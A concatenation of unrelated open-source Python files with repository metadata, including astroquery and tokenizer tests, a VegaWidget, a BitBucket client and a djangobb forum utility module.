"""
Base Service class, which acts as a descriptor for an OpenStack service
in the test environment
"""
class Service(object):
def __init__(self, config):
"""
Initializes the service.
:param config: `tempest.config.Config` object
"""
self.config = config
def get_client(self):
"""
Returns a client object that may be used to query
the service API.
"""
raise NotImplementedError
| {
"content_hash": "34cbcf92d4af2a6bd1ced8aecbdcc7a9",
"timestamp": "",
"source": "github",
"line_count": 22,
"max_line_length": 71,
"avg_line_length": 21.40909090909091,
"alnum_prop": 0.5944798301486199,
"repo_name": "armando-migliaccio/tempest",
"id": "e21092677d1f837c4c344330fd80f9aa0059c2a2",
"size": "1152",
"binary": false,
"copies": "6",
"ref": "refs/heads/master",
"path": "tempest/services/__init__.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "1966096"
},
{
"name": "Shell",
"bytes": "5228"
}
],
"symlink_target": ""
} |
import os
import re
import numpy as np
import pytest
from astropy.table import Table
import astropy.coordinates as coord
import astropy.units as u
from astroquery.utils.testing_tools import MockResponse
from astroquery.utils import commons
from astroquery.ipac.irsa import Irsa, conf
from astroquery.ipac import irsa
DATA_FILES = {'Cone': 'Cone.xml',
'Box': 'Box.xml',
'Polygon': 'Polygon.xml'}
OBJ_LIST = ["m31", "00h42m44.330s +41d16m07.50s",
commons.GalacticCoordGenerator(l=121.1743, b=-21.5733,
unit=(u.deg, u.deg))]
def data_path(filename):
data_dir = os.path.join(os.path.dirname(__file__), 'data')
return os.path.join(data_dir, filename)
@pytest.fixture
def patch_get(request):
mp = request.getfixturevalue("monkeypatch")
mp.setattr(Irsa, '_request', get_mockreturn)
return mp
def get_mockreturn(method, url, params=None, timeout=10, cache=False, **kwargs):
filename = data_path(DATA_FILES[params['spatial']])
content = open(filename, 'rb').read()
return MockResponse(content, **kwargs)
@pytest.mark.parametrize(('dim'),
['5d0m0s', 0.3 * u.rad, '5h0m0s', 2 * u.arcmin])
def test_parse_dimension(dim):
# check that the returned dimension is always in units of 'arcsec',
# 'arcmin' or 'deg'
new_dim = irsa.core._parse_dimension(dim)
assert new_dim.unit in ['arcsec', 'arcmin', 'deg']
@pytest.mark.parametrize(('ra', 'dec', 'expected'),
[(10, 10, '10 +10'),
(10.0, -11, '10.0 -11')
])
def test_format_decimal_coords(ra, dec, expected):
out = irsa.core._format_decimal_coords(ra, dec)
assert out == expected
@pytest.mark.parametrize(('coordinates', 'expected'),
[("5h0m0s 0d0m0s", "75.0 +0.0")
])
def test_parse_coordinates(coordinates, expected):
out = irsa.core._parse_coordinates(coordinates)
for a, b in zip(out.split(), expected.split()):
try:
a = float(a)
b = float(b)
np.testing.assert_almost_equal(a, b)
except ValueError:
assert a == b
def test_args_to_payload():
out = Irsa._args_to_payload("fp_psc")
assert out == dict(catalog='fp_psc', outfmt=3, outrows=conf.row_limit,
selcols='')
@pytest.mark.parametrize(("coordinates"), OBJ_LIST)
def test_query_region_cone_async(coordinates, patch_get):
response = Irsa.query_region_async(
coordinates, catalog='fp_psc', spatial='Cone',
radius=2 * u.arcmin, get_query_payload=True)
assert response['radius'] == 2
assert response['radunits'] == 'arcmin'
response = Irsa.query_region_async(
coordinates, catalog='fp_psc', spatial='Cone', radius=2 * u.arcmin)
assert response is not None
@pytest.mark.parametrize(("coordinates"), OBJ_LIST)
def test_query_region_cone(coordinates, patch_get):
result = Irsa.query_region(
coordinates, catalog='fp_psc', spatial='Cone', radius=2 * u.arcmin)
assert isinstance(result, Table)
@pytest.mark.parametrize(("coordinates"), OBJ_LIST)
def test_query_region_box_async(coordinates, patch_get):
response = Irsa.query_region_async(
coordinates, catalog='fp_psc', spatial='Box',
width=2 * u.arcmin, get_query_payload=True)
assert response['size'] == 120
response = Irsa.query_region_async(
coordinates, catalog='fp_psc', spatial='Box', width=2 * u.arcmin)
assert response is not None
@pytest.mark.parametrize(("coordinates"), OBJ_LIST)
def test_query_region_box(coordinates, patch_get):
result = Irsa.query_region(
coordinates, catalog='fp_psc', spatial='Box', width=2 * u.arcmin)
assert isinstance(result, Table)
poly1 = [coord.SkyCoord(ra=10.1, dec=10.1, unit=(u.deg, u.deg)),
coord.SkyCoord(ra=10.0, dec=10.1, unit=(u.deg, u.deg)),
coord.SkyCoord(ra=10.0, dec=10.0, unit=(u.deg, u.deg))]
poly2 = [(10.1 * u.deg, 10.1 * u.deg), (10.0 * u.deg, 10.1 * u.deg),
(10.0 * u.deg, 10.0 * u.deg)]
@pytest.mark.parametrize(("polygon"), [poly1, poly2])
def test_query_region_async_polygon(polygon, patch_get):
response = Irsa.query_region_async(
"m31", catalog="fp_psc", spatial="Polygon",
polygon=polygon, get_query_payload=True)
for a, b in zip(re.split("[ ,]", response["polygon"]),
re.split("[ ,]", "10.1 +10.1,10.0 +10.1,10.0 +10.0")):
for a1, b1 in zip(a.split(), b.split()):
a1 = float(a1)
b1 = float(b1)
np.testing.assert_almost_equal(a1, b1)
response = Irsa.query_region_async(
"m31", catalog="fp_psc", spatial="Polygon", polygon=polygon)
assert response is not None
@pytest.mark.parametrize(("polygon"),
[poly1,
poly2,
])
def test_query_region_polygon(polygon, patch_get):
result = Irsa.query_region(
"m31", catalog="fp_psc", spatial="Polygon", polygon=polygon)
assert isinstance(result, Table)
@pytest.mark.parametrize(('spatial', 'result'),
zip(('Cone', 'Box', 'Polygon', 'All-Sky'),
('Cone', 'Box', 'Polygon', 'NONE')))
def test_spatial_valdi(spatial, result):
out = Irsa._parse_spatial(
spatial, coordinates='m31', radius=5 * u.deg, width=5 * u.deg,
polygon=[(5 * u.hour, 5 * u.deg)] * 3)
assert out['spatial'] == result
@pytest.mark.parametrize(('spatial'), [('cone', 'box', 'polygon', 'all-Sky',
'All-sky', 'invalid', 'blah')])
def test_spatial_invalid(spatial):
with pytest.raises(ValueError):
Irsa._parse_spatial(spatial, coordinates='m31')
def test_deprecated_namespace_import_warning():
with pytest.warns(DeprecationWarning):
import astroquery.irsa
| {
"content_hash": "fcae81da23c13c8e6d1ac4f22a5bbe1f",
"timestamp": "",
"source": "github",
"line_count": 176,
"max_line_length": 80,
"avg_line_length": 33.89772727272727,
"alnum_prop": 0.6015755950385518,
"repo_name": "ceb8/astroquery",
"id": "abc7064168777408c31663bb3f522a388cadf532",
"size": "6031",
"binary": false,
"copies": "1",
"ref": "refs/heads/track_master",
"path": "astroquery/ipac/irsa/tests/test_irsa.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "HTML",
"bytes": "756486"
},
{
"name": "Python",
"bytes": "2760787"
}
],
"symlink_target": ""
} |
"""
test_tokenizer
~~~~~~~~~~~~~~
Tests for the :mod:`~pai_parser.tokenizer` module.
"""
import collections
import pytest
import shlex
from pai_parser import tokenizer
@pytest.mark.parametrize('data', [
int(),
float(),
list(),
tuple(),
dict(),
set(),
object()
])
def test_lexer_raises_on_non_str(data):
"""
Assert that :meth:`~tokenizer._lexer` raises a :class:`~ValueError` exception when
the `data` parameter is not a string.
"""
with pytest.raises(ValueError):
tokenizer._lexer(data)
@pytest.mark.parametrize('data', [
b'foo',
b'bar',
b'foo:bar',
b'foo:bar:baz'
])
def test_lexer_handles_bytes(data):
"""
Assert that :meth:`~tokenizer._lexer` returns a :class:`~shlex.shlex` instance when given a valid byte string.
"""
assert isinstance(tokenizer._lexer(data), shlex.shlex)
def test_lexer_returns_shlex_instance(valid_data_string):
"""
Assert that :meth:`~tokenizer._lexer` returns a :class:`~shlex.shlex` instance when given a valid string.
"""
assert isinstance(tokenizer._lexer(valid_data_string), shlex.shlex)
def test_lexer_sets_delimiter_whitespace_attribute(valid_delimiter):
"""
Assert that :meth:`~tokenizer._lexer` returns a :class:`~shlex.shlex` instance with the `whitespace` attribute
properly set to the given value.
"""
lexer = tokenizer._lexer('', delimiter=valid_delimiter)
assert lexer.whitespace == valid_delimiter
def test_tokenize_iter_returns_iterator():
"""
Assert that :meth:`~tokenizer.tokenize_iter` returns an object that implements the iterator protocol.
"""
assert isinstance(tokenizer.tokenize_iter(''), collections.Iterator)
def test_tokenize_iter_yields_nothing_on_empty_data():
"""
Assert that :meth:`~tokenizer.tokenize_iter` returns an empty iterator when given an empty string.
"""
with pytest.raises(StopIteration):
next(tokenizer.tokenize_iter(''))
def test_tokenize_returns_list():
"""
Assert that :meth:`~tokenizer.tokenize` returns a :class:`list` instance.
"""
assert isinstance(tokenizer.tokenize(''), list)
| {
"content_hash": "390d2ffbb3edf2a8986d1015cd069e8c",
"timestamp": "",
"source": "github",
"line_count": 81,
"max_line_length": 114,
"avg_line_length": 26.765432098765434,
"alnum_prop": 0.6646678966789668,
"repo_name": "ahawker/pai-parser",
"id": "97460cba50e317fedeb9a34a09038e25e8740c0f",
"size": "2168",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/test_tokenizer.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Makefile",
"bytes": "968"
},
{
"name": "Python",
"bytes": "24596"
}
],
"symlink_target": ""
} |
from django.contrib.auth.models import User
from django.contrib import messages
from django.contrib.auth.signals import user_logged_in
from django.utils.translation import ugettext_lazy as _
from django.dispatch import receiver
from django.db import models
from easy_thumbnails.fields import ThumbnailerImageField
from . import validators
class Profile(models.Model):
"""
A userprofile model that provides a short_info, twitter handle, website URL, avatar
field and details about number/age of accompanying children
This is also used as AUTH_PROFILE_MODULE.
"""
user = models.OneToOneField(User)
short_info = models.TextField(_('short info'), blank=True)
avatar = ThumbnailerImageField(_('avatar'), upload_to='avatars', null=True,
blank=True,
help_text=_('Please upload an image with a side length of at least 300 pixels.'))
num_accompanying_children = models.PositiveIntegerField(_('Number of accompanying children'),
null=True,
blank=True,
default=0)
age_accompanying_children = models.CharField(_("Age of accompanying children"), blank=True, max_length=20)
twitter = models.CharField(_("Twitter"), blank=True, max_length=20,
validators=[validators.twitter_username])
website = models.URLField(_("Website"), blank=True)
organisation = models.TextField(_('organisation'), blank=True)
@receiver(user_logged_in)
def show_logged_in_message(request, user, **kwargs):
messages.success(request, _("You've logged in successfully."),
fail_silently=True)
| {
"content_hash": "468d211d4d8a18766de2f15550caec9b",
"timestamp": "",
"source": "github",
"line_count": 39,
"max_line_length": 116,
"avg_line_length": 45.87179487179487,
"alnum_prop": 0.6327557294577977,
"repo_name": "zerok/pyconde-website-mirror",
"id": "28be9f51543d274e59aeecd6b7a7bc46b167e603",
"size": "1813",
"binary": false,
"copies": "1",
"ref": "refs/heads/develop",
"path": "pyconde/accounts/models.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "370341"
},
{
"name": "JavaScript",
"bytes": "349443"
},
{
"name": "Python",
"bytes": "906774"
},
{
"name": "Shell",
"bytes": "5122"
}
],
"symlink_target": ""
} |
"""Unicode string helper functions for UTF-16/32 variability.
Python has changed from always-16-bit Unicode strings to
sometimes-16-bit/sometimes-32-bit Unicode strings,
as indicated by sys.maxunicode.
The helper functions here deal with the differences.
"""
__author__ = "Markus Scherer"
import sys
class _UTF16(object):
@staticmethod
def CodePointString(cp):
return unichr(0xd7c0 + (cp >> 10)) + unichr(0xdc00 + (cp & 0x3ff))
class _UTF32(object):
@staticmethod
def CodePointString(cp):
return unichr(cp)
if sys.maxunicode == 0xffff:
UTF = _UTF16
elif sys.maxunicode == 0x10ffff:
UTF = _UTF32
else:
raise ValueError("unexpected sys.maxunicode = 0x%x" % sys.maxunicode)
| {
"content_hash": "2da27fdf41a507597c45dec4e4c87e66",
"timestamp": "",
"source": "github",
"line_count": 31,
"max_line_length": 71,
"avg_line_length": 22.64516129032258,
"alnum_prop": 0.7222222222222222,
"repo_name": "zentertainzhaomingliang/emoji4unicode",
"id": "92bd875c6ba033796551e13a7315a3a34c53264a",
"size": "1302",
"binary": false,
"copies": "7",
"ref": "refs/heads/master",
"path": "src/utf.py",
"mode": "33261",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "150736"
},
{
"name": "Shell",
"bytes": "3191"
}
],
"symlink_target": ""
} |
from __future__ import print_function
import contextlib
import json
import uuid
import sys
try:
from ipywidgets import DOMWidget
from traitlets import Unicode, Dict
except ImportError as err:
new_err = ImportError(
"vega.widget requires ipywidgets, which could not be imported. "
"Is ipywidgets installed?"
)
# perform manual exception chaining for python 2 compat
new_err.__cause__ = err
raise new_err
__all__ = ['VegaWidget']
class VegaWidget(DOMWidget):
"""An IPython widget display a vega chart.
Specifying the spec directly::
widget = VegaWidget({...})
widget.update(remove='datum.t < 5', insert=[{...}, {...}])
To modify the created plot, additional options can be passed as in::
widget = VegaWidget(spec, opt)
Usage with ``altair``::
widget = VegaWidget(chart.to_dict())
To select between vega and vega-lite use the ``$schema`` property on
the ``spec`` dictionary.
The chart can be updated by setting the ``spec`` property. In additon
embedding options, such as the used theme, can be set via the ``opt``
property::
widget.spec = {...}
widget.opt = {"theme": "dark"}
For streaming data, setting the whole spec may be slow. For this use case,
``VegaWidget`` offers the ``update`` method. It sends the data to the
client without persisting it on the Python side. In particular resetting
the ``spec`` and ``opt`` properties will lose any data changes performed
via ``update``.
"""
# Implementation note: there is a small delay between defining the widget
# and its display in the frontend. Any message sent during this time
# interval will be silently ignored by the client. To ensure all updates
# are handled, they are buffered on the python side until the widget is
# first displayed. The buffer is the `_pending_updates` attribute and the
# display state is reflected by the `_displayed` attribute.
_view_name = Unicode('VegaWidget').tag(sync=True)
_view_module = Unicode('nbextensions/jupyter-vega/widget').tag(sync=True)
_view_module_version = Unicode('0.1.0').tag(sync=True)
_spec_source = Unicode('null').tag(sync=True)
_opt_source = Unicode('null').tag(sync=True)
def __init__(self, spec=None, opt=None, **kwargs):
super().__init__(**kwargs)
self._spec_source = json.dumps(spec)
self._opt_source = json.dumps(opt)
self._displayed = False
self._pending_updates = []
self.on_msg(self._handle_message)
def _handle_message(self, widget, msg, _):
if msg['type'] != "display":
return
if self._displayed:
return
self._displayed = True
if not self._pending_updates:
return
self.send(dict(type="update", updates=self._pending_updates))
self._pending_updates = []
def _reset(self):
self._displayed = False
self._pending_updates = []
@property
def spec(self):
return json.loads(self._spec_source)
@spec.setter
def spec(self, value):
self._spec_source = json.dumps(value)
self._reset()
@property
def opt(self):
return json.loads(self._opt_source)
@opt.setter
def opt(self, value):
self._opt_source = json.dumps(value)
self._reset()
def update(self, key, remove=None, insert=None):
"""Update the chart data.
Updates are only reflected on the client, i.e., after re-displaying
the widget will show the chart specified in its spec property.
:param Optional[str] remove:
a JavaScript expression of items to remove. The item to test can
be accessed as ``datum``. For example, the call
``update(remove="datum.t < 5")`` removes all items with the
property ``t < 5``.
:param Optional[List[dict]] insert:
new items to add to the chat data.
"""
update = dict(key=key)
if remove is not None:
update['remove'] = remove
if insert is not None:
update['insert'] = insert
if self._displayed:
self.send(dict(type="update", updates=[update]))
else:
self._pending_updates.append(update)
| {
"content_hash": "31f93ea24d410ed5005afd0f8110bdcf",
"timestamp": "",
"source": "github",
"line_count": 145,
"max_line_length": 78,
"avg_line_length": 29.96551724137931,
"alnum_prop": 0.6197928653624856,
"repo_name": "uwdata/ipython-vega",
"id": "d87486bcbe298d834027bfdcc2d64de1e5fd4222",
"size": "4345",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "vega/widget.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "HTML",
"bytes": "865"
},
{
"name": "JavaScript",
"bytes": "377"
},
{
"name": "Jupyter Notebook",
"bytes": "7694504"
},
{
"name": "Python",
"bytes": "6556"
}
],
"symlink_target": ""
} |
"""
Created on Wed Jun 8 12:02:40 2016
@author: ericgrimson
"""
cube = 27
epsilon = 0.01
guess = 0.0
increment = 0.0001
num_guesses = 0
while abs(guess**3 - cube) >= epsilon:
guess += increment
num_guesses += 1
print('num_guesses =', num_guesses)
if abs(guess**3 - cube) >= epsilon:
print('Failed on cube root of', cube)
else:
print(guess, 'is close to the cube root of', cube)
| {
"content_hash": "51c6a41782b4aab4c0d03711a0ab15bf",
"timestamp": "",
"source": "github",
"line_count": 20,
"max_line_length": 54,
"avg_line_length": 19.9,
"alnum_prop": 0.6407035175879398,
"repo_name": "mkhuthir/learnPython",
"id": "6886f1d51cad05fdafd8d0a317defe170832c955",
"size": "422",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "edX_mitX_6_00_1x/L3/cubeRootApproxBetter.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "7706"
}
],
"symlink_target": ""
} |
""" Defines a client class for working with a specific BitBucket repository's services. """
from bitbucket.urls import repository_services_url, repository_service_url
class BitBucketRepositoryServicesClient(object):
""" Client class representing the services under a repository in bitbucket. """
def __init__(self, dispatcher, access_token, access_token_secret, namespace, repository_name):
self._dispatcher = dispatcher
self._access_token = access_token
self._access_token_secret = access_token_secret
self._namespace = namespace
self._repository_name = repository_name
@property
def namespace(self):
""" Returns the namespace. """
return self._namespace
@property
def repository_name(self):
""" Returns the repository name. """
return self._repository_name
def all(self):
""" Returns a list of the services found under the repository. """
url = repository_services_url(self._namespace, self._repository_name)
return self._dispatcher.dispatch(url, access_token=self._access_token,
access_token_secret=self._access_token_secret)
def get(self, service_id):
""" Returns the contents of the specified service. """
url = repository_service_url(self._namespace, self._repository_name, service_id)
return self._dispatcher.dispatch(url, access_token=self._access_token,
access_token_secret=self._access_token_secret)
def delete(self, service_id):
""" Deletes the specified service. """
url = repository_service_url(self._namespace, self._repository_name, service_id)
return self._dispatcher.dispatch(url, method='DELETE', access_token=self._access_token,
access_token_secret=self._access_token_secret)
def create(self, type, **kwargs):
""" Creates a new service. """
url = repository_services_url(self._namespace, self._repository_name)
return self._dispatcher.dispatch(url, method='POST', access_token=self._access_token,
access_token_secret=self._access_token_secret,
type=type, **kwargs)
| {
"content_hash": "72f69d2831773bb6136db76107d29fc4",
"timestamp": "",
"source": "github",
"line_count": 47,
"max_line_length": 96,
"avg_line_length": 46.723404255319146,
"alnum_prop": 0.6598360655737705,
"repo_name": "coreos/py-bitbucket",
"id": "ecc3de19c2eedab512438e874448c1cadd5a384d",
"size": "2196",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "bitbucket/services.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "33745"
}
],
"symlink_target": ""
} |
"""Test generic alias support with mix of typing.py and stdlib types.
Possible with postponed evaluation enabled, starting with PY37.
"""
# flake8: noqa
# pylint: disable=missing-docstring,pointless-statement
# pylint: disable=too-few-public-methods,multiple-statements,line-too-long
from __future__ import annotations
import collections
import collections.abc
import contextlib
import re
import typing
# Type annotations
var_orderedDict: collections.OrderedDict[int, str]
var_container: collections.abc.Container[int]
var_sequence: collections.abc.Sequence[int]
var_iterable: collections.abc.Iterable[int]
var_awaitable: collections.abc.Awaitable[int]
var_pattern: re.Pattern[int]
var_bytestring: collections.abc.ByteString
var_hashable: collections.abc.Hashable
var_ContextManager: contextlib.AbstractContextManager[int]
# No implementation required for 'builtins'
class DerivedListIterable(typing.List[typing.Iterable[int]]):
pass
# Missing implementation for 'collections.abc' derived classes
class DerivedHashable(typing.Hashable): # [abstract-method] # __hash__
pass
class DerivedIterable(typing.Iterable[int]): # [abstract-method] # __iter__
pass
class DerivedCollection(typing.Collection[int]): # [abstract-method,abstract-method,abstract-method] # __contains__, __iter__, __len__
pass
| {
"content_hash": "6e5f4f17a1707b4d442750b57fe07efd",
"timestamp": "",
"source": "github",
"line_count": 41,
"max_line_length": 136,
"avg_line_length": 32.31707317073171,
"alnum_prop": 0.780377358490566,
"repo_name": "ruchee/vimrc",
"id": "cb7a4d0f43a62f2d743f15e26872f10e3ee9f082",
"size": "1325",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "vimfiles/bundle/vim-python/submodules/pylint/tests/functional/g/generic_alias/generic_alias_mixed_py37.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "22028"
},
{
"name": "Blade",
"bytes": "3314"
},
{
"name": "C#",
"bytes": "1734"
},
{
"name": "CSS",
"bytes": "31547"
},
{
"name": "Clojure",
"bytes": "47036"
},
{
"name": "CoffeeScript",
"bytes": "9274"
},
{
"name": "Common Lisp",
"bytes": "54314"
},
{
"name": "D",
"bytes": "11562"
},
{
"name": "Dockerfile",
"bytes": "7620"
},
{
"name": "Elixir",
"bytes": "41696"
},
{
"name": "Emacs Lisp",
"bytes": "10489"
},
{
"name": "Erlang",
"bytes": "137788"
},
{
"name": "F#",
"bytes": "2230"
},
{
"name": "Go",
"bytes": "54655"
},
{
"name": "HTML",
"bytes": "178954"
},
{
"name": "Haml",
"bytes": "39"
},
{
"name": "Haskell",
"bytes": "2031"
},
{
"name": "JavaScript",
"bytes": "9086"
},
{
"name": "Julia",
"bytes": "9540"
},
{
"name": "Kotlin",
"bytes": "8669"
},
{
"name": "Less",
"bytes": "327"
},
{
"name": "Makefile",
"bytes": "87500"
},
{
"name": "Mustache",
"bytes": "3375"
},
{
"name": "Nix",
"bytes": "1860"
},
{
"name": "PHP",
"bytes": "9238"
},
{
"name": "PLpgSQL",
"bytes": "33747"
},
{
"name": "Perl",
"bytes": "84200"
},
{
"name": "PostScript",
"bytes": "3891"
},
{
"name": "Python",
"bytes": "7366233"
},
{
"name": "Racket",
"bytes": "1150"
},
{
"name": "Raku",
"bytes": "21146"
},
{
"name": "Ruby",
"bytes": "133344"
},
{
"name": "SCSS",
"bytes": "327"
},
{
"name": "Sass",
"bytes": "308"
},
{
"name": "Scala",
"bytes": "13125"
},
{
"name": "Shell",
"bytes": "52916"
},
{
"name": "Smarty",
"bytes": "300"
},
{
"name": "Swift",
"bytes": "11436"
},
{
"name": "TypeScript",
"bytes": "4663"
},
{
"name": "Vim Script",
"bytes": "10545492"
},
{
"name": "Vim Snippet",
"bytes": "559139"
}
],
"symlink_target": ""
} |
"""Package init file for telluride_decoding.
"""
# No imports here, instead use
# from telluride_decoding import XXX
# where XXX is the individual file name.
| {
"content_hash": "0bb204a291dcb0b5d3b1ad39f060567a",
"timestamp": "",
"source": "github",
"line_count": 6,
"max_line_length": 44,
"avg_line_length": 27,
"alnum_prop": 0.7345679012345679,
"repo_name": "google/telluride_decoding",
"id": "b0f7080797f68e2de9774f10e236fb174306798b",
"size": "819",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "telluride_decoding/__init__.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Jupyter Notebook",
"bytes": "78749"
},
{
"name": "Python",
"bytes": "636978"
},
{
"name": "Starlark",
"bytes": "4757"
}
],
"symlink_target": ""
} |
from datetime import datetime
import os.path
import random
import re
from HTMLParser import HTMLParser
try:
import markdown
except ImportError:
pass
from django.shortcuts import render_to_response
from django.template import RequestContext
from django.http import HttpResponse, Http404
from django.utils.functional import Promise
from django.utils.translation import force_unicode, check_for_language
from django.utils.simplejson import JSONEncoder
from django import forms
from django.template.defaultfilters import urlize as django_urlize
from django.core.paginator import Paginator, EmptyPage, InvalidPage
from django.contrib.sites.models import Site
from django.conf import settings
from djangobb_forum import settings as forum_settings
from djangobb_forum.markups import bbmarkup
#compile smiles regexp
_SMILES = [(re.compile(smile_re), path) for smile_re, path in forum_settings.SMILES]
def render_to(template):
"""
Decorator for Django views that sends returned dict to render_to_response function.
Template name can be decorator parameter or TEMPLATE item in returned dictionary.
RequestContext always added as context instance.
If view doesn't return dict then decorator simply returns output.
Parameters:
- template: template name to use
Examples:
# 1. Template name in decorator parameters
@render_to('template.html')
def foo(request):
bar = Bar.object.all()
return {'bar': bar}
# equals to
def foo(request):
bar = Bar.object.all()
return render_to_response('template.html',
{'bar': bar},
context_instance=RequestContext(request))
# 2. Template name as TEMPLATE item value in return dictionary
@render_to()
def foo(request, category):
template_name = '%s.html' % category
return {'bar': bar, 'TEMPLATE': template_name}
#equals to
def foo(request, category):
template_name = '%s.html' % category
return render_to_response(template_name,
{'bar': bar},
context_instance=RequestContext(request))
"""
def renderer(function):
def wrapper(request, *args, **kwargs):
output = function(request, *args, **kwargs)
if not isinstance(output, dict):
return output
tmpl = output.pop('TEMPLATE', template)
return render_to_response(tmpl, output, context_instance=RequestContext(request))
return wrapper
return renderer
def absolute_url(path):
return 'http://%s%s' % (Site.objects.get_current().domain, path)
def paged(paged_list_name, per_page):
"""
Parse page from GET data and pass it to view. Split the
query set returned from view.
"""
def decorator(func):
def wrapper(request, *args, **kwargs):
result = func(request, *args, **kwargs)
if not isinstance(result, dict) or 'paged_qs' not in result:
return result
try:
page = int(request.GET.get('page', 1))
except ValueError:
page = 1
real_per_page = per_page
#if per_page_var:
#try:
#value = int(request.GET[per_page_var])
#except (ValueError, KeyError):
#pass
#else:
#if value > 0:
#real_per_page = value
from django.core.paginator import Paginator
paginator = Paginator(result['paged_qs'], real_per_page)
try:
result[paged_list_name] = paginator.page(page).object_list
except (InvalidPage, EmptyPage):
raise Http404
result['page'] = page
result['page_list'] = range(1, paginator.num_pages + 1)
result['pages'] = paginator.num_pages
result['per_page'] = real_per_page
result['request'] = request
return result
return wrapper
return decorator
def ajax(func):
"""
Checks request.method is POST. Return error in JSON in other case.
If view returned dict, returns JsonResponse with this dict as content.
"""
def wrapper(request, *args, **kwargs):
if request.method == 'POST':
try:
response = func(request, *args, **kwargs)
except Exception, ex:
response = {'error': traceback.format_exc()}
else:
response = {'error': {'type': 403, 'message': 'Accepts only POST request'}}
if isinstance(response, dict):
return JsonResponse(response)
else:
return response
return wrapper
class LazyJSONEncoder(JSONEncoder):
"""
This fing need to save django from crashing.
"""
def default(self, o):
if isinstance(o, Promise):
return force_unicode(o)
else:
return super(LazyJSONEncoder, self).default(o)
class JsonResponse(HttpResponse):
"""
HttpResponse subclass that serialize data into JSON format.
"""
def __init__(self, data, mimetype='application/json'):
json_data = LazyJSONEncoder().encode(data)
super(JsonResponse, self).__init__(
content=json_data, mimetype=mimetype)
def build_form(Form, _request, GET=False, *args, **kwargs):
"""
Shorcut for building the form instance of given form class
"""
if not GET and 'POST' == _request.method:
form = Form(_request.POST, _request.FILES, *args, **kwargs)
elif GET and 'GET' == _request.method:
form = Form(_request.GET, _request.FILES, *args, **kwargs)
else:
form = Form(*args, **kwargs)
return form
class ExcludeTagsHTMLParser(HTMLParser):
"""
Class for html parsing with excluding specified tags.
"""
def __init__(self, func, tags=('a', 'code')):
HTMLParser.__init__(self)
self.func = func
self.is_ignored = False
self.tags = tags
self.html = []
def handle_starttag(self, tag, attrs):
self.html.append('<%s%s>' % (tag, self.__html_attrs(attrs)))
if tag in self.tags:
self.is_ignored = True
def handle_data(self, data):
if not self.is_ignored:
data = self.func(data)
self.html.append(data)
def handle_startendtag(self, tag, attrs):
self.html.append('<%s%s/>' % (tag, self.__html_attrs(attrs)))
def handle_endtag(self, tag):
self.is_ignored = False
self.html.append('</%s>' % (tag))
def handle_entityref(self, name):
self.html.append('&%s;' % name)
def handle_charref(self, name):
self.html.append('&#%s;' % name)
def unescape(self, s):
#we don't need unescape data (without this possible XSS-attack)
return s
def __html_attrs(self, attrs):
_attrs = ''
if attrs:
_attrs = ' %s' % (' '.join([('%s="%s"' % (k,v)) for k,v in attrs]))
return _attrs
def feed(self, data):
HTMLParser.feed(self, data)
self.html = ''.join(self.html)
def urlize(data):
"""
Urlize plain text links in the HTML contents.
Do not urlize content of A and CODE tags.
"""
parser = ExcludeTagsHTMLParser(django_urlize)
parser.feed(data)
urlized_html = parser.html
parser.close()
return urlized_html
def _smile_replacer(data):
for smile, path in _SMILES:
data = smile.sub(path, data)
return data
def smiles(data):
"""
Replace text smiles.
"""
parser = ExcludeTagsHTMLParser(_smile_replacer)
parser.feed(data)
smiled_html = parser.html
parser.close()
return smiled_html
def paginate(items, request, per_page, total_count=None):
try:
page_number = int(request.GET.get('page', 1))
except ValueError:
page_number = 1
paginator = Paginator(items, per_page)
pages = paginator.num_pages
try:
paged_list_name = paginator.page(page_number).object_list
except (InvalidPage, EmptyPage):
raise Http404
return pages, paginator, paged_list_name
def set_language(request, language):
"""
Change the language of session of authenticated user.
"""
if language and check_for_language(language):
if hasattr(request, 'session'):
request.session['django_language'] = language
else:
response.set_cookie(settings.LANGUAGE_COOKIE_NAME, language)
def convert_text_to_html(text, markup):
if markup == 'bbcode':
text = bbmarkup.bbcode(text)
elif markup == 'markdown':
text = markdown.markdown(text, safe_mode='escape')
else:
raise Exception('Invalid markup property: %s' % markup)
return urlize(text)
| {
"content_hash": "2841a35a209675c2f4cf3fee7d97e9a5",
"timestamp": "",
"source": "github",
"line_count": 299,
"max_line_length": 93,
"avg_line_length": 30.301003344481604,
"alnum_prop": 0.5934878587196468,
"repo_name": "SBillion/aegroupware",
"id": "3d8d43b3dd4da7661b3bd046373b3e5b10ff2b40",
"size": "9060",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "modules/djangobb_forum/util.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "240030"
},
{
"name": "JavaScript",
"bytes": "761483"
},
{
"name": "PHP",
"bytes": "1052"
},
{
"name": "Perl",
"bytes": "35754"
},
{
"name": "Python",
"bytes": "358520"
},
{
"name": "Ruby",
"bytes": "244"
},
{
"name": "TeX",
"bytes": "2537"
}
],
"symlink_target": ""
} |
"""
.. module:: test_mayer
:synopsis: Tests the ingestion of Mayer database
.. moduleauthor:: Ian Thomas <Ian.Edward.Thomas@rmit.edu.au>
"""
from django.test import TestCase
from smra.smra_portal.ReposPlugin import ReposPlugin
from smra.smra_portal.models import Repository
from smra.smra_portal.models import System
from smra.smra_portal.models import Key
from smra.smra_portal.models import MediaObjectParameter
from smra.smra_portal.models import ParameterName
from smra.smra_portal.repos.Mayer import ReposConverter
# FIXME: must be an easier way than doing this
class NoClass:
pass
class SimpleIngestTest(TestCase):
fixtures = ['sprint4demousers','sprint4demo']
